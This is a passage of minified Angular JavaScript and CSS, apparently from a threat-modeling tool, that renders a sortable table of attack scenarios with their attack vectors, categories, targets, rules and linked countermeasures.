as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}button[_ngcontent-%COMP%]{font-size:11px;line-height:20px}.buttonAsText[_ngcontent-%COMP%]{background:none;border:none;margin:0;padding:0;cursor:pointer;font-size:small}.matSelect[_ngcontent-%COMP%]{background-color:#fff!important;border-radius:2px;height:17px;border:gray 1px solid}.matSelect[_ngcontent-%COMP%] .mat-select-arrow{color:#000!important}.matSelect[_ngcontent-%COMP%] .mat-select-value{color:#000!important;font-size:smaller!important}.searchBox[_ngcontent-%COMP%]{background-color:#fff!important;height:17px;color:#000;border:0;outline:0;padding:0 8px;width:calc(100% - 16px)}.searchBox[_ngcontent-%COMP%]::placeholder{color:gray}.matOption[_ngcontent-%COMP%]{background-color:#fff!important;color:#000!important;height:20px!important;padding:0 8px!important}.matOption[_ngcontent-%COMP%] .mat-option.mat-active{color:#000!important;background-color:#fff!important}.matOption[_ngcontent-%COMP%] .mat-pseudo-checkbox{color:gray!important}.invalid[_ngcontent-%COMP%]{border:1px solid red}.disable[_ngcontent-%COMP%]{pointer-events:none} .mat-tooltip{white-space:pre-line!important}.flowAnchorOverlay[_ngcontent-%COMP%]{border:solid 1px #ccc;border-radius:5px;margin:0}.flowAnchorOverlay-dark[_ngcontent-%COMP%], .flowAnchorOverlay-light[_ngcontent-%COMP%]{border-color:#fff}.iconBtn[_ngcontent-%COMP%]{height:24px;width:25px;min-width:25px;padding:0;line-height:20px}.anchorBtn[_ngcontent-%COMP%]{height:18px;width:18px;min-width:18px;padding:0;line-height:18px}"]}),t})();const Zdt=["searchCMBox"];function emt(t,a){1&t&&it(0,"mat-progress-spinner",32),2&t&&F("diameter",20)}function tmt(t,a){if(1&t&&(m(0,"span",33),s(1),u()),2&t){const e=V();g(1),ke(e.GetApplicableCount())}}function imt(t,a){1&t&&(m(0,"th",34),s(1," "),u())}function amt(t,a){if(1&t&&(m(0,"td",35),s(1," "),m(2,"mat-icon"),s(3),u(),s(4," "),u()),2&t){const e=a.$implicit,i=V();g(3),ke(i.GetStateIcon(e))}}function nmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct(" ",re(2,1,"general.Number")," "))}function omt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;g(1),ct(" ",e.Number," ")}}function rmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct(" ",re(2,1,"general.Name")," "))}function smt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;g(1),ct(" ",e.GetProperty("Name")," ")}}function cmt(t,a){1&t&&(m(0,"th",36),s(1," "),u())}function lmt(t,a){if(1&t&&(m(0,"td",35),s(1," "),m(2,"mat-icon",37),oe(3,"translate"),s(4),u(),s(5," "),u()),2&t){const e=a.$implicit,i=V();g(2),at("matTooltip",re(3,4,i.GetCreationTypeIconTooltip(e))),F("matBadge","!")("matBadgeHidden",e.RuleStillApplies),g(2),ke(i.GetCreationTypeIcon(e))}}function dmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct(" ",re(2,1,"general.AttackVector")," "))}function mmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;g(1),ct(" ",null==e.AttackVector?null:e.AttackVector.GetProperty("Name")," ")}}function umt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct(" ",re(2,1,"general.ThreatCategories")," "))}function hmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit,i=V();g(1),ct(" ",i.GetThreatCategories(e)," ")}}function fmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct(" ",re(2,1,"general.Target")," "))}function pmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;Ct("selected-cell",V().IsElementSelected(e)),g(1),ct(" ",null==e.Target?null:e.Target.GetProperty("Name")," ")}}function _mt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct(" ",re(2,1,"general.Rule")," "))}function gmt(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=V().$implicit;g(1),ke(e.ThreatRule.GetProperty("Name"))}}function Cmt(t,a){if(1&t&&(m(0,"td",35),s(1," "),ne(2,gmt,2,1,"ng-container",38),u()),2&t){const e=a.$implicit;g(2),F("ngIf",e.ThreatRule)}}function ymt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct(" ",re(2,1,"general.Elements")," "))}function bmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit,i=V();Ct("selected-cell",i.IsElementSelected(e)),g(1),ct(" ",i.GetTargets(e)," ")}}function Mmt(t,a){1&t&&(m(0,"th",39),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct(" ",re(2,1,"general.Countermeasures")," "))}function vmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit,i=V();g(1),ct(" ",i.GetCountermeasures(e)," ")}}function Amt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct(" ",re(2,1,"properties.Status")," "))}function Tmt(t,a){if(1&t&&(m(0,"option",42),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(2);F("value",e),g(1),ke(re(2,2,i.GetThreatStateName(e)))}}function Emt(t,a){if(1&t){const e=Ye();m(0,"td",35),s(1,"\n "),m(2,"select",40),he("ngModelChange",function(n){return Me(be(e).$implicit.ThreatState=n)}),s(3,"\n "),ne(4,Tmt,3,4,"option",41),s(5,"\n "),u(),s(6,"\n "),u()}if(2&t){const e=a.$implicit,i=V();g(2),F("ngModel",e.ThreatState),g(2),F("ngForOf",i.GetThreatStates())}}function Dmt(t,a){1&t&&(m(0,"th",39),s(1," "),u())}function xmt(t,a){if(1&t){const e=Ye();m(0,"td",35),s(1," "),m(2,"mat-icon",43),he("click",function(n){const c=be(e).$implicit;return Me(V().OpenContextMenu(n,c))}),oe(3,"translate"),s(4,"more_vert"),u(),s(5," "),u()}2&t&&(g(2),at("matTooltip",re(3,1,"general.More")))}function wmt(t,a){1&t&&it(0,"tr",44)}function Imt(t,a){if(1&t){const e=Ye();m(0,"tr",45),he("click",function(){const r=be(e).$implicit;return Me(V().SelectThreat(r))})("dblclick",function(n){const c=be(e).$implicit;return Me(V().OnMappingDblClick(c,n))})("contextmenu",function(n){const c=be(e).$implicit;return Me(V().OpenContextMenu(n,c))}),s(1,"\n "),u()}if(2&t){const e=a.$implicit,i=V();Ct("selected-item",i.IsThreatSelected(e))("removed-item",i.IsThreatRemoved(e)||i.IsThreatNotApplying(e)),F("id",e.ID)}}function Rmt(t,a){if(1&t){const e=Ye();m(0,"tr",46),s(1,"\n "),m(2,"td",47),he("contextmenu",function(n){return be(e),Me(V().OpenContextMenu(n,null))}),s(3),oe(4,"translate"),u(),s(5,"\n "),u()}2&t&&(g(3),ke(re(4,1,"pages.modeling.threattable.noThreats")))}function Smt(t,a){1&t&&(m(0,"th",34),s(1," "),u())}function kmt(t,a){if(1&t&&(m(0,"td",35),s(1," "),m(2,"mat-icon"),s(3),u(),s(4," "),u()),2&t){const e=a.$implicit,i=V();g(3),ke(i.GetStateIcon(e))}}function Pmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct(" ",re(2,1,"general.Number")," "))}function Omt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;g(1),ct(" ",e.Number," ")}}function Nmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct(" ",re(2,1,"general.Name")," "))}function Lmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;g(1),ct(" ",e.GetProperty("Name")," ")}}function zmt(t,a){1&t&&(m(0,"th",36),s(1," "),u())}function Wmt(t,a){if(1&t&&(m(0,"td",35),s(1," "),m(2,"mat-icon",37),oe(3,"translate"),s(4),u(),s(5," "),u()),2&t){const e=a.$implicit,i=V();g(2),at("matTooltip",re(3,4,i.GetCreationTypeIconTooltip(e))),F("matBadge","!")("matBadgeHidden",e.RuleStillApplies),g(2),ke(i.GetCreationTypeIcon(e))}}function Fmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct(" ",re(2,1,"general.AttackVector")," "))}function Vmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;g(1),ct(" ",null==e.AttackVector?null:e.AttackVector.GetProperty("Name")," ")}}function Bmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct(" ",re(2,1,"general.ThreatCategories")," "))}function Hmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit,i=V();g(1),ct(" ",i.GetThreatCategories(e)," ")}}function Umt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct(" ",re(2,1,"general.Target")," "))}function qmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;Ct("selected-cell",V().IsElementSelected(e)),g(1),ct(" ",null==e.Target?null:e.Target.GetProperty("Name")," ")}}function Gmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct(" ",re(2,1,"general.Rule")," "))}function jmt(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=V().$implicit;g(1),ke(e.ThreatRule.GetProperty("Name"))}}function Qmt(t,a){if(1&t&&(m(0,"td",35),s(1," "),ne(2,jmt,2,1,"ng-container",38),u()),2&t){const e=a.$implicit;g(2),F("ngIf",e.ThreatRule)}}function $mt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct(" ",re(2,1,"general.Elements")," "))}function Kmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit,i=V();Ct("selected-cell",i.IsElementSelected(e)),g(1),ct(" ",i.GetTargets(e)," ")}}function Xmt(t,a){1&t&&(m(0,"th",39),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct(" ",re(2,1,"general.Countermeasures")," "))}function Ymt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit,i=V();g(1),ct(" ",i.GetCountermeasures(e)," ")}}function Jmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct(" ",re(2,1,"properties.Status")," "))}function Zmt(t,a){if(1&t&&(m(0,"option",42),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(2);F("value",e),g(1),ke(re(2,2,i.GetThreatStateName(e)))}}function eut(t,a){if(1&t){const e=Ye();m(0,"td",35),s(1,"\n "),m(2,"select",40),he("ngModelChange",function(n){return Me(be(e).$implicit.ThreatState=n)}),s(3,"\n "),ne(4,Zmt,3,4,"option",41),s(5,"\n "),u(),s(6,"\n "),u()}if(2&t){const e=a.$implicit,i=V();g(2),F("ngModel",e.ThreatState),g(2),F("ngForOf",i.GetThreatStates())}}function tut(t,a){1&t&&(m(0,"th",39),s(1," "),u())}function iut(t,a){if(1&t){const e=Ye();m(0,"td",35),s(1," "),m(2,"mat-icon",43),he("click",function(n){const c=be(e).$implicit;return Me(V().OpenContextMenu(n,c))}),oe(3,"translate"),s(4,"more_vert"),u(),s(5," "),u()}2&t&&(g(2),at("matTooltip",re(3,1,"general.More")))}function aut(t,a){if(1&t){const e=Ye();m(0,"tr",48),he("click",function(){const r=be(e).$implicit;return Me(V().SelectThreat(r))})("dblclick",function(n){const c=be(e).$implicit;return Me(V().OnMappingDblClick(c,n))})("contextmenu",function(n){const c=be(e).$implicit;return Me(V().OpenContextMenu(n,c))}),s(1,"\n "),u()}if(2&t){const e=a.$implicit,i=V();Ct("selected-item",i.IsThreatSelected(e))("removed-item",i.IsThreatRemoved(e)||i.IsThreatNotApplying(e))}}function nut(t,a){if(1&t&&(m(0,"span",62),s(1),u()),2&t){const e=V().item;g(1),ke(e.GetProperty("Name"))}}function out(t,a){1&t&&(m(0,"span",62),s(1),oe(2,"translate"),u()),2&t&&(g(1),ke(re(2,1,"pages.modeling.threattable.noEntrySelected")))}const rut=function(t){return{item:t}};function sut(t,a){if(1&t&&(m(0,"button",63),s(1),u()),2&t){const e=a.$implicit;V(),F("matMenuTriggerFor",Ti(48))("matMenuTriggerData",fr(3,rut,e.countermeasures)),g(1),ke(e.name)}}function cut(t,a){if(1&t){const e=Ye();m(0,"button",64),he("click",function(){const r=be(e).$implicit,c=V(2).item;return Me(V().AddExistingCountermeasure(c,r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),g(1),ke(e.Name)}}function lut(t,a){if(1&t&&(s(0,"\n "),ne(1,cut,2,2,"button",61),s(2,"\n ")),2&t){const e=a.item;g(1),F("ngForOf",e)}}function dut(t,a){if(1&t){const e=Ye();m(0,"button",64),he("click",function(){const r=be(e).$implicit,c=V().item;return Me(V().AddExistingCountermeasure(c,r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),g(1),ke(e.Name)}}function mut(t,a){if(1&t){const e=Ye();s(0,"\n "),ne(1,nut,2,1,"span",49),s(2," \n "),ne(3,out,3,3,"span",49),s(4,"\n "),m(5,"button",50),he("click",function(){const r=be(e).item;return Me(V().OnMappingDblClick(r,null))}),s(6,"\n "),m(7,"mat-icon"),s(8,"edit"),u(),s(9,"\n "),m(10,"span"),s(11),oe(12,"translate"),u(),s(13,"\n "),u(),s(14," \n "),m(15,"button",51),s(16,"\n "),m(17,"mat-icon"),s(18,"security"),u(),s(19,"\n "),m(20,"span"),s(21),oe(22,"translate"),u(),s(23,"\n "),u(),s(24,"\n "),m(25,"mat-menu",null,52),s(27,"\n "),m(28,"button",53),he("click",function(){const r=be(e).item;return Me(V().AddCountermeasure(r))}),s(29),oe(30,"translate"),u(),s(31,"\n "),m(32,"button",54),s(33),oe(34,"translate"),u(),s(35,"\n "),u(),s(36,"\n "),m(37,"mat-menu",null,55),s(39,"\n "),m(40,"input",56,57),he("ngModelChange",function(n){return be(e),Me(V().searchCMString=n)})("click",function(){return be(e),Me(V().OnSearchCMBoxClick())}),oe(42,"translate"),u(),s(43,"\n "),ne(44,sut,2,5,"button",58),s(45,"\n "),u(),s(46,"\n "),m(47,"mat-menu",null,59),s(49,"\n "),ne(50,lut,3,1,"ng-template",31),s(51," \n "),u(),s(52,"\n "),m(53,"mat-menu",null,60),s(55,"\n "),ne(56,dut,2,2,"button",61),s(57,"\n "),u(),s(58,"\n\n "),m(59,"button",50),he("click",function(){const r=be(e).item;return Me(V().OnViewCountermeasures(r))}),s(60,"\n "),m(61,"mat-icon"),s(62,"preview"),u(),s(63,"\n "),m(64,"span"),s(65),oe(66,"translate"),u(),s(67,"\n "),u(),s(68," \n "),m(69,"button",50),he("click",function(){const r=be(e).item;return Me(V().OnDeleteMapping(r))}),s(70,"\n "),m(71,"mat-icon"),s(72,"delete"),u(),s(73,"\n "),m(74,"span"),s(75),oe(76,"translate"),u(),s(77,"\n "),u(),s(78,"\n "),m(79,"button",53),he("click",function(){return be(e),Me(V().ResetNumbers())}),s(80,"\n "),m(81,"mat-icon"),s(82,"delete"),u(),s(83,"\n "),m(84,"span"),s(85),oe(86,"translate"),u(),s(87,"\n "),u(),s(88,"\n ")}if(2&t){const e=a.item,i=Ti(26),n=Ti(38),r=Ti(54),c=V();g(1),F("ngIf",e),g(2),F("ngIf",!e),g(2),F("disabled",!e),g(6),ke(re(12,20,"pages.modeling.threattable.editEntry")),g(4),F("disabled",!e)("matMenuTriggerFor",i),g(6),ke(re(22,22,"pages.modeling.diagram.addCountermeasure")),g(8),ke(re(30,24,"general.New")),g(3),F("matMenuTriggerFor",n),g(1),ke(re(34,26,"general.Existing")),g(7),at("placeholder",re(42,28,"general.Search")),F("ngModel",c.searchCMString)("matMenuTriggerFor",r),g(4),F("ngForOf",c.GetCountermeasureGroups(e)),g(12),F("ngForOf",c.GetFilteredCountermeasures(e)),g(3),F("disabled",!e),g(6),ke(re(66,30,"pages.modeling.threattable.viewCountermeasures")),g(4),F("disabled",!e),g(6),ke(re(76,32,"pages.modeling.threattable.deleteEntry")),g(10),ke(re(86,34,"pages.modeling.threattable.resetNumbers"))}}let uut=(()=>{class t{constructor(e,i,n,r,c){this.theme=e,this.dataService=i,this.threatEngine=n,this.dialog=r,this.translate=c,this.changesCounter=0,this.isCalculatingThreats=!1,this._attackScenarios=[],this.countermeasureCounts={},this.displayedColumns=[],this.autoRefreshThreats=!0,this.menuTopLeftPosition={x:"0",y:"0"},this.selectedObjectChanged=new Tt,this.threatCountChanged=new Tt,this.searchCMString="";let d=()=>{this.autoRefreshThreats&&(0==this.changesCounter?setTimeout(()=>{this.isCalculatingThreats=!0,this.changesCounter++},10):this.changesCounter++,setTimeout(()=>{this.changesCounter--,0==this.changesCounter&&this.RefreshThreats()},3e3))};this.dataService.Project&&setTimeout(()=>{var T,k,q,Y;null===(T=this.dataService.Project)||void 0===T||T.DFDElementsChanged.subscribe(te=>d()),null===(k=this.dataService.Project)||void 0===k||k.MyComponentsChanged.subscribe(te=>d()),null===(q=this.dataService.Project)||void 0===q||q.AttackScenariosChanged.subscribe(te=>{te.Type==Ja.Added&&(this.dataService.Project.GetAttackScenario(te.ID).IsGenerated||d()),this.countermeasureCounts={}}),null===(Y=this.dataService.Project)||void 0===Y||Y.CountermeasuresChanged.subscribe(te=>this.countermeasureCounts={})},1e3)}get refreshingThreats(){return this.changesCounter>0||this.isCalculatingThreats}get AttackScenarios(){return this._attackScenarios}set AttackScenarios(e){this._filteredObject&&(e=e.filter(d=>d.Targets.includes(this._filteredObject)||d.Target==this._filteredObject)),this._attackScenarios=e;const i=(d,T)=>"name"==T?d.Name:"number"==T?Number(d.Number):"state"==T?d.MappingState:"type"==T?d.IsGenerated?1:0:"vector"==T?d.AttackVector.Name:"status"==T?d.ThreatState:"categories"==T?this.GetThreatCategories(d):"target"==T?d.Target.Name:"rule"==T?d.ThreatRule.Name:"elements"==T?this.GetTargets(d):void console.error("Missing sorting header"),n=(d,T)=>{let k=T.trim().toLowerCase(),q=d.Name.toLowerCase().indexOf(k);return-1==q&&d.AttackVector&&(q=d.AttackVector.Name.toLowerCase().indexOf(k)),-1==q&&this.GetThreatCategories(d)&&(q=this.GetThreatCategories(d).toLowerCase().indexOf(k)),-1==q&&this.GetTargets(d)&&(q=this.GetTargets(d).toLowerCase().indexOf(k)),-1==q&&d.ThreatRule&&(q=d.ThreatRule.Name.toLowerCase().indexOf(k)),-1!=q},r=e.filter(d=>![_o.NotApplicable,_o.Duplicate].includes(d.ThreatState));r.sort((d,T)=>Number(d.Number)[_o.NotApplicable,_o.Duplicate].includes(d.ThreatState));c.sort((d,T)=>Number(d.Number){this.SelectThreat(r[c]);const d=this.rows.find(T=>T.nativeElement.id===r[c].ID);null==d||d.nativeElement.scrollIntoView({block:"center",behavior:"smooth"})};if("ArrowDown"==e.key){const r=this.dataSourceActive.sortData(this.dataSourceActive.filteredData,this.sort),c=r.indexOf(this.selectedThreat);c0&&n(r,c-1)}}["ArrowDown","ArrowUp"].includes(e.key)&&(e.preventDefault(),e.stopImmediatePropagation())}}RefreshThreats(){setTimeout(()=>{var e,i,n;this.AttackScenarios=[],!(null===(e=this._selectedNode)||void 0===e)&&e.data&&((null===(i=this._selectedNode)||void 0===i?void 0:i.data)instanceof ns?this.AttackScenarios=this.threatEngine.GenerateDiagramThreats(this._selectedNode.data):(null===(n=this._selectedNode)||void 0===n?void 0:n.data)instanceof Om&&(this.AttackScenarios=this.threatEngine.GenerateStackThreats(this._selectedNode.data))),this.threatCountChanged.emit(this.dataSourceActive.data.length),this.countermeasureCounts={},this.isCalculatingThreats=!1},10)}OnMappingDblClick(e,i){i&&i.target&&"countermeasures"==this.displayedColumns[i.target.cellIndex]&&this.dataService.Project.GetCountermeasures().filter(n=>n.AttackScenarios.includes(e)).length>0?this.OnViewCountermeasures(e):this.dialog.OpenAttackScenarioDialog(e,!1,[...this.dataSourceActive.sortData(this.dataSourceActive.filteredData,this.sort),...this.dataSourceNA.sortData(this.dataSourceNA.filteredData,this.sort)])}ApplyFilter(e){const i=e.target.value;this.dataSourceActive.filter=i.trim().toLowerCase(),this.dataSourceNA.filter=i.trim().toLowerCase()}IsThreatSelected(e){return this.selectedThreat==e}IsThreatRemoved(e){return e.MappingState==zn.Removed}IsThreatNotApplying(e){return[_o.NotApplicable,_o.Duplicate].includes(e.ThreatState)}SelectThreat(e){this.selectedThreat=e,e.Target&&this.selectedObjectChanged.emit(e.Target)}IsElementSelected(e){return e&&this.selectedObject&&(e.Target==this.selectedObject||e.Targets.includes(this.selectedObject))}GetFilteredCountermeasures(e){return this.dataService.Project.GetCountermeasuresApplicable().filter(i=>i.Name.toLowerCase().includes(this.searchCMString.toLowerCase())&&!i.AttackScenarios.includes(e))}GetCountermeasureGroups(e){if(null==this.countermeasureGroups){this.countermeasureGroups=[];const i=this.dataService.Project.GetCountermeasuresApplicable().filter(n=>!e.GetCountermeasures().includes(n)).reduce((n,r)=>Object.assign(Object.assign({},n),{[r.ViewID]:[...n[r.ViewID]||[],r]}),{});Object.keys(i).forEach(n=>{var r;this.countermeasureGroups.push({name:null===(r=this.dataService.Project.GetView(n))||void 0===r?void 0:r.Name,countermeasures:i[n]})}),this.countermeasureGroups.forEach(n=>n.countermeasures.sort((r,c)=>r.MitigationState>c.MitigationState?-1:r.MitigationState==c.MitigationState?0:1))}return this.countermeasureGroups}AddCountermeasure(e){const i=this.dataService.Project.CreateCountermeasure(this.selectedNode.data.ID,!1);i.SetMapping(null,e.Targets,[e]);let n=[];this.selectedNode.data instanceof ns?n=this.selectedNode.data.Elements.GetChildrenFlat():this.selectedNode.data instanceof Om&&(n=this.selectedNode.data.GetChildrenFlat()),this.dialog.OpenCountermeasureDialog(i,!0,n).subscribe(r=>{r||this.dataService.Project.DeleteCountermeasure(i),this.countermeasureCounts[e.ID]=null})}AddExistingCountermeasure(e,i){i.AddAttackScenario(e),this.countermeasureCounts[e.ID]=null,e.Target&&i.AddTarget(e.Target)}OnViewCountermeasures(e){this.dataService.Project.GetCountermeasures().filter(i=>i.AttackScenarios.includes(e)).forEach(i=>{this.dialog.OpenCountermeasureDialog(i,!1,null)})}OnDeleteMapping(e){this.dataService.Project.DeleteAttackScenario(e),this.RefreshThreats()}ResetNumbers(){const e=this.dataService.Project.GetAttackScenarios().sort((i,n)=>Number(i.Number)-Number(n.Number));for(let i=0;ii.Name).join(", ")}GetTargets(e){return e.Targets.map(i=>i.GetProperty("Name")).join(", ")}GetCountermeasures(e){if(null==this.countermeasureCounts[e.ID]){const i=this.dataService.Project.GetCountermeasuresApplicable().filter(n=>n.AttackScenarios.includes(e)).length;this.countermeasureCounts[e.ID]=0==i?this.translate.instant("pages.modeling.threattable.noCountermeasure"):i.toString()+" "+this.translate.instant("pages.modeling.threattable.countermeasures")}return this.countermeasureCounts[e.ID]}GetApplicableCount(){return Gi.Format(this.translate.instant("pages.modeling.threattable.applicable"),this.dataSourceActive.data.length.toString(),this.AttackScenarios.length.toString())}GetThreatStates(){return ku.GetThreatStates()}GetThreatStateName(e){return ku.ToString(e)}OnSearchCMBoxClick(){var e,i,n;null===(n=null===(i=null===(e=this.searchCMBox)||void 0===e?void 0:e._elementRef)||void 0===i?void 0:i.nativeElement)||void 0===n||n.focus()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(RT),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-table"]],viewQuery:function(e,i){if(1&e&&(Mi(po,5),Mi(al,5),Mi(Zdt,5),Mi(xc,5,mi)),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first),Vt(n=Bt())&&(i.sort=n.first),Vt(n=Bt())&&(i.searchCMBox=n.first),Vt(n=Bt())&&(i.rows=n)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},inputs:{isActive:"isActive",selectedNode:"selectedNode",selectedObject:"selectedObject",filteredObject:"filteredObject"},outputs:{selectedObjectChanged:"selectedObjectChanged",threatCountChanged:"threatCountChanged"},decls:221,vars:38,consts:[[2,"height","100%","display","grid","align-content","start"],[1,"tools"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"matTooltip","click"],["matInput","",1,"filterInput",3,"placeholder","keyup"],["style","display: inline; vertical-align: super; margin-left: 5px;","mode","indeterminate",3,"diameter",4,"ngIf"],["style","float: right; padding-top: 5px;",4,"ngIf"],[2,"overflow","auto"],["mat-table","","matSort","","matSortActive","state","matSortDirection","asc","matSortDisableClear","",2,"width","100%",3,"dataSource"],["matColumnDef","state"],["mat-header-cell","","mat-sort-header","","style","width: 34px;",4,"matHeaderCellDef"],["mat-cell","",4,"matCellDef"],["matColumnDef","number"],["mat-header-cell","","mat-sort-header","",4,"matHeaderCellDef"],["matColumnDef","name"],["matColumnDef","type"],["matColumnDef","vector"],["matColumnDef","categories"],["matColumnDef","target"],["mat-cell","",3,"selected-cell",4,"matCellDef"],["matColumnDef","rule"],["matColumnDef","elements"],["matColumnDef","countermeasures"],["mat-header-cell","",4,"matHeaderCellDef"],["matColumnDef","status"],["matColumnDef","more"],["mat-header-row","","style","height: 30px;",4,"matHeaderRowDef","matHeaderRowDefSticky"],["mat-row","",3,"id","selected-item","removed-item","click","dblclick","contextmenu",4,"matRowDef","matRowDefColumns"],["class","mat-row",4,"matNoDataRow"],["mat-row","",3,"selected-item","removed-item","click","dblclick","contextmenu",4,"matRowDef","matRowDefColumns"],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["rightMenu","matMenu"],["matMenuContent",""],["mode","indeterminate",2,"display","inline","vertical-align","super","margin-left","5px",3,"diameter"],[2,"float","right","padding-top","5px"],["mat-header-cell","","mat-sort-header","",2,"width","34px"],["mat-cell",""],["mat-header-cell","","mat-sort-header",""],["matBadgeColor","warn","matBadgeSize","small","matBadgePosition","below",3,"matBadge","matBadgeHidden","matTooltip"],[4,"ngIf"],["mat-header-cell",""],[2,"width","140px",3,"ngModel","ngModelChange"],[3,"value",4,"ngFor","ngForOf"],[3,"value"],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-header-row","",2,"height","30px"],["mat-row","",3,"id","click","dblclick","contextmenu"],[1,"mat-row"],["colspan","9",1,"mat-cell",3,"contextmenu"],["mat-row","",3,"click","dblclick","contextmenu"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"disabled","click"],["mat-menu-item","",3,"disabled","matMenuTriggerFor"],["addMenu","matMenu"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"matMenuTriggerFor"],["existingMenu","matMenu"],["mat-menu-item","",3,"ngModel","matMenuTriggerFor","placeholder","ngModelChange","click"],["searchCMBox",""],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData",4,"ngFor","ngForOf"],["countermeasureList","matMenu"],["filteredCountermeasureList","matMenu"],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngFor","ngForOf"],[2,"margin-left","20px","margin-right","20px"],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData"],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click"]],template:function(e,i){if(1&e&&(m(0,"div",0),s(1,"\n "),m(2,"div",1),s(3,"\n "),m(4,"button",2),he("click",function(){return i.RefreshThreats()}),oe(5,"translate"),s(6,"\n "),m(7,"mat-icon"),s(8,"refresh"),u(),s(9,"\n "),u(),s(10,"\n "),m(11,"button",2),he("click",function(){return i.autoRefreshThreats=!i.autoRefreshThreats}),oe(12,"translate"),s(13,"\n "),m(14,"mat-icon"),s(15,"autorenew"),u(),s(16,"\n "),u(),s(17,"\n "),m(18,"input",3),he("keyup",function(r){return i.ApplyFilter(r)}),oe(19,"translate"),u(),s(20,"\n "),ne(21,emt,1,1,"mat-progress-spinner",4),s(22,"\n "),ne(23,tmt,2,1,"span",5),s(24,"\n "),u(),s(25,"\n "),m(26,"div",6),s(27,"\n "),s(28,"\n "),m(29,"table",7),s(30,"\n "),bt(31,8),s(32,"\n "),ne(33,imt,2,0,"th",9),s(34,"\n "),ne(35,amt,5,1,"td",10),s(36,"\n "),Mt(),s(37,"\n "),bt(38,11),s(39,"\n "),ne(40,nmt,3,3,"th",12),s(41,"\n "),ne(42,omt,2,1,"td",10),s(43,"\n "),Mt(),s(44,"\n "),bt(45,13),s(46,"\n "),ne(47,rmt,3,3,"th",12),s(48,"\n "),ne(49,smt,2,1,"td",10),s(50,"\n "),Mt(),s(51,"\n "),bt(52,14),s(53,"\n "),ne(54,cmt,2,0,"th",12),s(55,"\n "),ne(56,lmt,6,6,"td",10),s(57,"\n "),Mt(),s(58,"\n "),bt(59,15),s(60,"\n "),ne(61,dmt,3,3,"th",12),s(62,"\n 